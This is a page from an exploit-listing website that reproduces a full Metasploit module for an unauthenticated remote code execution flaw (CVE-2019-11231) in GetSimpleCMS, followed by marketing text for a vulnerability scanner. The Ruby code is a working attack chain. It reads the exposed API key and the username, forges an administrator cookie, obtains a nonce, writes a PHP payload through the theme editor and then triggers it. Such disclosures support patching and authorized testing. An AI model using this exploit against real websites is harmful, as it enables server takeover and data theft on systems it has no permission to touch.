getsimplecms unauthenticated remote code execution (metasploit)

▸▸▸ Exploit & Vulnerability >>   remote exploit & php vulnerability




Online Vulnerability Scanner Tools
getsimplecms unauthenticated remote code execution (metasploit) Code Code... 
				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "GetSimpleCMS Unauthenticated RCE",
      'Description'    => %q{
        This module exploits a vulnerability found in GetSimpleCMS,
        which allows unauthenticated attackers to perform Remote Code Execution.
        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
        however authentication can be bypassed by leaking the cms API key to target the session manager.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
        ],
      'References'     =>
        [
          ['CVE', '2019-11231'],
          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['GetSimpleCMS 3.3.15 and before', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Apr 28 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
      ])
  end

  def gscms_version
      res = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
      )
      return unless res && res.code == 200

      generator = res.get_html_document.at(
        '//script[@type = "text/javascript"]/@src'
        )

      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
      vers = generator.value.split('?v=').last.gsub(".","")
      return unless vers
      @version = vers
  end

  def get_salt
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
    @salt = res.get_xml_document.at('apikey').text
  end

  def get_user
    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
  end

  def gen_cookie(version,salt,username)
    cookie_name = "getsimple_cookie_#{version}"
    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")

    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
  end
  def get_nonce(cookie)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
      'cookie' =>  cookie,
      'vars_get' => {
          't' => 'Innovation',
          'f' => 'Default Template',
          's' => 'Edit'
      }
    })

    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
  end

  def exploit
    unless check == CheckCode::Vulnerable
        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
    end
    version = gscms_version
    salt = get_salt
    username = get_user
    cookie = gen_cookie(version,salt,username)
    nonce = get_nonce(cookie)

    fname = "#{rand_text_alpha(6..16)}.php"
    php   = %Q|<?php #{payload.encoded} ?>|
    upload_file(cookie,nonce,fname,php)
    send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path,'theme',fname),
    })
  end

  def check
    version = gscms_version
    unless version
        return CheckCode::Safe
    end
    vprint_status "GetSimpleCMS version #{version}"
    unless vulnerable
        return CheckCode::Detected
    end
    CheckCode::Vulnerable
  end

  def vulnerable
    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200

    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => uri
    )
    return unless res && res.code == 200
    return true
  end

  def upload_file(cookie,nonce,fname,content)
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
      'cookie'    => cookie,
      'vars_post' => {
        'submitsave'    => 2,
        'edited_file' => fname,
        'content' => content,
        'nonce' => nonce
      }
    })
  end
end

Getsimplecms unauthenticated remote code execution (metasploit) Vulnerability / Exploit Source : Getsimplecms unauthenticated remote code execution (metasploit)



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.